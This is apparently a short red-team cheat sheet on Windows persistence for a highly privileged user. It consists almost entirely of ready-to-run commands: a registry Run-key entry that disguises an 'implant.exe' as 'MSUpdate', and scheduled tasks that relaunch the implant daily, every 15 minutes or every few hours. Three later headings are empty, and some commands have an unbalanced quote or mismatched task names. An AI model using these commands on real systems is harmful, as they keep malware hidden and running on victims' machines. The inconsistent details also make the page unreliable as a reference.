High Priv User
Persistence techniques for high privileged user
Reg Keys:
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v MSUpdate /t REG_SZ /d C:\Windows\Tasks\implant.exe" /fScheduled Tasks:
Create New Task:
# normal @ 09:00 daily
schtasks /create /tn "MyTask\go" /sc daily /st 09:00 /tr "C:\windows\tasks\implant.exe"
# normal @ every 15 minutes
schtasks /create /tn "MyTask\go" /sc minute /mo 15 /tr "C:\windows\tasks\implant.exe"
# normal @ every 3 hours between 9-5
schtasks /create /tn "MyTask\go" /sc hourly /mo 3 /st 09:00 /etu 17:00 /tr "C:\windows\tasks\implant.exe"
# query
schtasks /query /tn "MyTask\Go" /fo list /v
# run
schtasks /run /tn "MyTasks/Go"
# delete
schtasks /delete /tn "MyTasks/Go"Take Over Task/ multiple actions:
Service:
Application Shimming:
Last updated